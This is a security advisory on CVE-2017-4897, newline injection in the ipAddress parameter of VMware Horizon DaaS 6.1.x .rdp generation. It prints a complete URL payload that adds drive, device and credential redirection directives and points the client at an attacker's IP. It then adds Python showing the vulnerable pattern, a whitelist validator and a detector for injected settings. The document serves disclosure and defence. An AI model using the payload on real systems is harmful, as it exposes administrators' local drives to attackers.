VMware Horizon DaaS - Improper IP Address Validation
- CVE(s): VMSA-2017-0002, CVE-2017-4897
- Publish Date: 10 March 2017
- Vendor: VMware
- Product: Horizon DaaS Platform
- Version(s) affected: 6.1.x
- Fixed version: 7.0.0
- Author: Ahmad Ashraff
A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.
Improper IP Address Validation (CVE-2017-4897)
Horizon DaaS allows an administrator to generate a remote desktop connection (.rdp) file through the application; this action is restricted to users with administrative privilege. The request looks similar to the following:
<host>/admin/getRdpByIp.action?ipAddress=<ip-address>
However, it was found that the ipAddress parameter of getRdpByIp does not properly validate the input supplied by the user. By placing newline characters (%0a) in the parameter, it is possible to append extra settings to the generated remote desktop connection file, such as drive mapping redirections.
Example:
https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's-ip-address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull
An authenticated administrator who is manipulated into clicking the above URL receives a remote desktop connection file. Once the file is opened, the client connects to the attacker's IP address, and because the injected settings enable drive redirection, the administrator's local drives are mapped into the attacker's remote desktop session.
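The root cause described above is newline injection into a line-oriented file format: any value that reaches the .rdp body unfiltered can terminate the "full address" line and start new directives. The following Python is an added illustration, not VMware's code (the real Horizon DaaS handler is not public). It shows the vulnerable concatenation pattern beside a whitelist validator for the ipAddress parameter, plus a small .rdp parser that flags the security-relevant directives a legitimate request would never carry, usable as a check on emitted files or on the URL-decoded parameter in request logs. RDP_TEMPLATE, build_rdp_unsafe, build_rdp_safe, validate_ip_param, is_valid_ip_param, injected_settings and the sample input are all constructed for this example.

```python
"""Added example: .rdp newline injection and its mitigation.

Assumption (hypothetical, not from the advisory): the server produces the
.rdp file by dropping the raw ipAddress value into a fixed template.
"""
import ipaddress
import re

# Constructed template; a real generator emits many more settings.
RDP_TEMPLATE = (
    "full address:s:{address}\r\n"
    "screen mode id:i:2\r\n"
    "drivestoredirect:s:\r\n"  # empty value: no local drives redirected
)

# Directives that change what the client exposes or who it logs in as.
RISKY_KEYS = {
    "drivestoredirect", "devicestoredirect", "redirectclipboard",
    "redirectprinters", "redirectsmartcards", "redirectcomports",
    "username", "domain", "gatewayhostname",
}


def build_rdp_unsafe(ip_param: str) -> str:
    """Vulnerable pattern: user input reaches the file unmodified."""
    return RDP_TEMPLATE.format(address=ip_param)


# Whitelist: an IPv4 literal, optionally ':' and a port. No CR, LF or anything
# else can match, so a second .rdp line cannot be injected.
_PARAM_RE = re.compile(r"(?P<ip>[0-9.]+)(?::(?P<port>\d{1,5}))?")


def validate_ip_param(ip_param: str) -> str:
    """Return a canonical 'ip' or 'ip:port' string, or raise ValueError."""
    m = _PARAM_RE.fullmatch(ip_param)  # fullmatch rejects a trailing newline
    if not m:
        raise ValueError("ipAddress must be an IPv4 address with optional port")
    ip = ipaddress.IPv4Address(m.group("ip"))  # raises on e.g. 999.1.1.1
    if m.group("port") is None:
        return str(ip)
    port = int(m.group("port"))
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return f"{ip}:{port}"


def is_valid_ip_param(ip_param: str) -> bool:
    """Boolean wrapper around validate_ip_param for callers that only filter."""
    try:
        validate_ip_param(ip_param)
        return True
    except ValueError:
        return False


def build_rdp_safe(ip_param: str) -> str:
    """Hardened form: only a validated, canonical address reaches the template."""
    return RDP_TEMPLATE.format(address=validate_ip_param(ip_param))


def injected_settings(rdp_text: str) -> dict:
    """Parse 'name:type:value' lines and return risky settings with a value set.

    A file built from a clean request returns an empty dict; anything else is
    worth alerting on.
    """
    found = {}
    for line in re.split(r"\r?\n", rdp_text):
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        name, value = parts[0].strip().lower(), parts[2]
        if name in RISKY_KEYS and value != "":
            found[name] = value
    return found


if __name__ == "__main__":
    # Constructed sample: the URL-decoded shape of the advisory's payload.
    sample = "198.51.100.10:3389\ndrivestoredirect:s:*\nusername:s:Administrator"
    print(build_rdp_unsafe(sample))
    print("flagged:", injected_settings(build_rdp_unsafe(sample)))
    print("validator accepts payload:", is_valid_ip_param(sample))
    print(build_rdp_safe("198.51.100.10:3389"))
```

The validator is a positive whitelist rather than a blacklist of %0a and %0d: the client-side .rdp parser, not the web framework, decides what a line break is, so the only robust rule is to accept nothing but the characters an address needs and to re-serialize the value from the parsed ipaddress object instead of echoing the input.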